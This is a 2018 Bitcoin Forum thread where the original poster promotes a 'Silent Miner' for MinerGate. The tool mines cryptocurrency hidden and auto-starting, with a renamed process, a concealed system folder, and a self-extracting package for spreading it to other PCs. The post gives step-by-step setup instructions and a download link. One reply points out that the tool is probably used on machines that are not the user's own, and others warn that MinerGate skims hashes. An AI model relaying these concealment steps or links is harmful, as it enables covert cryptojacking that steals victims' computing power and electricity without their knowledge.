Bitcoin Forum
May 14, 2024, 05:41:20 AM *
News: Latest Bitcoin Core release: 27.0 [Torrent]

Home   Help Search Login Register More  
Pages: [1]
  Print  
Author Topic: Silent Mining (MinerGate)Mine with GPU+CPU  (Read 420 times)
crypto_vagito (OP)

Activity: 12
Merit: 0

View Profile
June 14, 2018, 12:19:24 AM
Last edit: July 18, 2018, 08:32:56 PM by crypto_vagito

Silent Mining (MinerGate)Mine with GPU+CPU without dialog+module rename.
Silent mining  including the new BTC, XMO, XMR and ETH etc
(MinerGate)Mine with GPU+CPU Hidden without dialog+module rename.
Channel: https://www.youtube.com/channel/UCfJgZ-fsIAQsusm-R38GEgA?sub_confirmation=1
Create MinerGate: https://minergate.com/a/eec708d061ebda9dc319d895

You can Mine hidden and anonymously by this.
just go on steps, then make a Distribution Package, which can extract anywhere in the Pc by VARIABLE PATH by winrar- Sfx and start mining: https://youtu.be/6UvoTF7X-qk
no time u can make kh/s+. and will auto-start.
Steps
----------
Watch full video(YouTube):
https://youtu.be/2NKLnqYlBSY

1- Download Silent Miner VERSION 1.0.0.14
2- Extract files;
3- Generate INI file for configuration;
4- Off the Msg on Startup.. just click  and start mining;
5- Change the  .exe name from process;
6- Set the configuration parameters;
7- Choose any system folder to hide the miner;
8- Run the program again.

Download Silent Miner 1.0.0.14
--------------------------------

Alternative Url 1: https://mega.nz/#!3yxHQCgT!R0KE5vNEKNF0k3fozCErtfsdXGDsFH4yk9K0G04STuA

Currency Options
----------------
  =aeon
  =bcn
  =btg
  =dsh
  =dsh+fcn
  =dsh+mcn
  =etc
  =eth
  =fcn
  =inf8
  =inf8+fcn
  =inf8+mcn
  =mcn
  =qcn
  =qcn+fcn
  =qcn+mcn
  =xdn
  =xmo
  =xmo+fcn
  =xmo+xdn
  =xmr
  =zec

View Profile Personal Message (Offline)

Ignore
Reply with quote  #2

Report to moderator
TalkImg was created especially for hosting images on bitcointalk.org: try it next time you want to post an image
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
jings007

Activity: 174
Merit: 7

View Profile
June 15, 2018, 07:27:00 AM

Well, this post quite good, impressive, but I just noticed that the link you provide for video tutorial is messy
I try to install minergate on my computer desktop, I got an error. 'Cannot write to registry' and I found a good and understanding tutorial at this link.  https://www.youtube.com/watch?v=r5l75aUmYOM
crypto_vagito (OP)

View Profile
June 15, 2018, 04:54:32 PM

well yes thats our video also...
well wat doubt u have.. u can ask.. will be glad to reply
and yes minergate cant write in registry mostly if u have local user.. try to open as administrator.. and it will be good..
and yes.. u dont need to install minergate to make this work... u can just setup ur minergate email and it will be mining ur pc on background sillently
lordvek

Activity: 83

View Profile
June 15, 2018, 06:42:59 PM

Tried Minergate some day. Tried hardcore (lol) pool mining the other day.
When I discovered that my hashrate and the number of earned coins are SUDDENLY quite lower with Minergate, I quit.
So be careful.
crypto_vagito (OP)

View Profile
June 17, 2018, 08:45:57 PM

@lordvek.. how much differnce h/s u get?
Littledragons

Activity: 294
Merit: 102

View Profile
June 18, 2018, 12:09:38 AM

When I discovered that my hashrate and the number of earned coins are SUDDENLY quite lower with Minergate, I quit.
So be careful.

Yeah. Minergate is pretty well known for stealing hashes - theres no good reason for it, honestly. Just be warned.
If you really want a one click mining solution just use Nicehash.

T r a x i o n                              TRADE AND EARN DURING PRE-ICO
TRANSITIONS YOU TO A CRYPTO-READY SOCIETY        Pre-Sale starts April 15, 2018
GITHUB     TELEGRAM     MEDIUM     FACEBOOK     TWITTER     REDDIT     YOUTUBE
Nooby-miner

Activity: 62

View Profile
July 16, 2018, 12:23:39 AM

So be careful.

Yeah. Minergate is pretty well known for stealing hashes - theres no good reason for it, honestly. Just be warned.
If you really want a one click mining solution just use Nicehash.

I stopped mining there a long time ago, after spotting mods bragging in miner-gate chat how others using miner-gate unknowingly were mining for them. i took several screen shots it and sent to support, they never replied, so who knows how deep it goes, maybe mg is in on it, or told them to hand over the coins to them or else.
VaporFace

Activity: 6

View Profile
July 16, 2018, 11:36:58 AM

If you have issues with MinerGate, you can always contact them via this address support@minergate.com. If they are not answering (sometimes it happens) you can send your ticket number to them via Facebook or Twitter. It's the best way to solve any problem with MinerGate quickly. Their FAQ probably can be useful, too: https://minergate.com/faq/about I prefer to ignore their chat mods. Support is much more reliable.
VaporFace

Activity: 6

View Profile
July 16, 2018, 12:32:44 PM

I stopped mining there a long time ago, after spotting mods bragging in miner-gate chat how others using miner-gate unknowingly were mining for them. i took several screen shots it and sent to support.

BTW, would you be so kind to share these screenshots here?
crypto_vagito (OP)

View Profile
July 25, 2018, 05:16:15 AM

Smiley Smiley Smiley Smiley
RBEP-RBC
Copper Member

Activity: 45

View Profile WWW
July 25, 2018, 08:17:52 AM

If you're using this it's probably not for your own rig so devs just getting a piece of that action.
Bondex69

Activity: 229
Merit: 10

View Profile WWW
July 25, 2018, 08:42:40 AM

If minerged in minergate can i use gpu? If you can, please give me a tutorial. I have one vga gtx1060 confused what to do

PTON PRE-SALE Live    █████████████     FORESTING    █████████████  PARTICIPATE NOW!
█████ next-generation social media service based on blockchain technology   ██████
 █ ██ █  ● Twitter ● Facebook ● Youtube ● Telegram [EN] ● Telegram [KOR] ● Medium  █ ██ █  
edwardceng

Activity: 266
Merit: 50

View Profile
July 25, 2018, 08:49:05 AM

@Bondex69

it's better to try mining in Nicehash or switch manually coins, that's GPU can be mining in some algorithm such as Equihash.

for more information about 1060, use search function there is a few topics about 1060

leowonderful
Legendary

Activity: 1624
Merit: 1129

Bitcoin FTW!

View Profile
July 25, 2018, 09:10:40 AM

If you're looking for software to mine ETH without the assistance of often fee-laden auto switching software like MinerGate (or even Nicehash), Claymore and PhoenixMiner are two good places to start. There's even more options out there if you just go a few pages back in this subforum as we are in Altcoin Mining after all.

Most mining software does have a devfee nowadays, but you'll definitely save on fees compared to profit-switching mining software. Plus, you actually learn how to mine compared to clicking buttons that load preset configurations! As they say, knowledge is power.
crypto_vagito (OP)

View Profile
July 29, 2018, 06:12:46 PM

ohh ok.. but this is different.. it will mine without any notification and silently..  i have noo idea it has dev fee or nt.. but this works perfect to mine without any dos or anything just silently
Pages: [1]
  Print  

Jump to: